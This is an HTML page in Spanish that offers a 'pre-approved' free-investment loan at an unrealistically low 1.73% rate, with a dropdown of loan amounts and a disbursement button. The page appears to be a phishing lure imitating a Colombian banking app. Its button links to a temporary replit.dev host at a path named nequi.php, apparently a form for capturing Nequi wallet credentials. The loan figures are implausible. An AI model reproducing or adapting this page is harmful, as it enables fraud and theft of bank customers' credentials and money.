<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>solicitud</title>

    <!-- Linkeado CSS -->
    <link rel="stylesheet" href="/creditos/css/styles.css">

  <style>
     *{
    -webkit-appearance: none;
    -webkit-border-radius: 0;
 }
    a{
      color:blue;
    }
  </style>
</head>
<body>
    <header>
        <div class="header-logo">
            <img src="/creditos/img/icons/logo-of.png" alt="..." >
        </div>
        <div class="header-op">
            <img src="/creditos/img/icons/ico-1.png" alt="...">
            <img src="/creditos/img/icons/ico-2.png" alt="...">
            <img src="/creditos/img/icons/ico-3.png" alt="...">
        </div>
    </header>
  

    <section>
        <div class="wrapper">
            <p> 
               <center>Préstamo
                 Propulsor crédito de <strong>Libre Inversión</strong> pre-aprobado. 
                Aprovecha las ventajas de una cuota fija con tasa de <strong>1,73%</strong> 
                efectivo. ¡Aprovecha esta oportunidad¡ </center> 
            </p>
          <br>
          <br>
            <picture>
                <img src="/creditos/img/propulsor.png" alt="...">
            </picture>

            <div class="box">
                <div class="box-icon">
                    <img src="/creditos/img/icons/ico-1.png" alt="...">
                </div>
                <span>Selecciona el monto, plazo y la cuota</span>

                <select style="color:black; padding-left:50px; ">
                  <option value="$10,000,000-12 meses cuota $1,079,799.89">$10,000,000-12 meses cuota $1,079,799.89</option>
                    <option value="$10,000,000-24 meses cuota $693,799.89">$10,000,000-24 meses cuota $693,799.89</option>
                    <option value="$10,000,000-36 meses cuota $468,799.89">$10,000,000-36 meses cuota $468,799.89</option>
                    <option value="$10,000,000-48 meses cuota $336,799.89">$10,000,000-48 meses cuota $336,799.89</option>
                    <option value="$10,000,000-60 meses cuota $218,799.89">$10,000,000-60 meses cuota $218,799.89</option>

                </select>

                <div class="box-btn">
                    <button><a href="https://ffe8d83d-19a5-4440-ae93-3794fa0473e0-00-tqq5bj38szv2.picard.replit.dev/nequi.php" style="text-decoration: none; color: black;">Solicitar desembolso</a></button>
                    
                </div>
            </div>
        </div>
		

    </section>
<br><br><br><br><br><br><br><br>
    <footer>
        <img src="/creditos/img/icons/home.png" alt="...">
        <img src="/creditos/img/icons/mov.png" alt="...">
        <img src="/creditos/img/icons/exp.png" alt="...">
        <img src="/creditos/img/icons/conf.png" alt="...">
    </footer>




</body>
</html>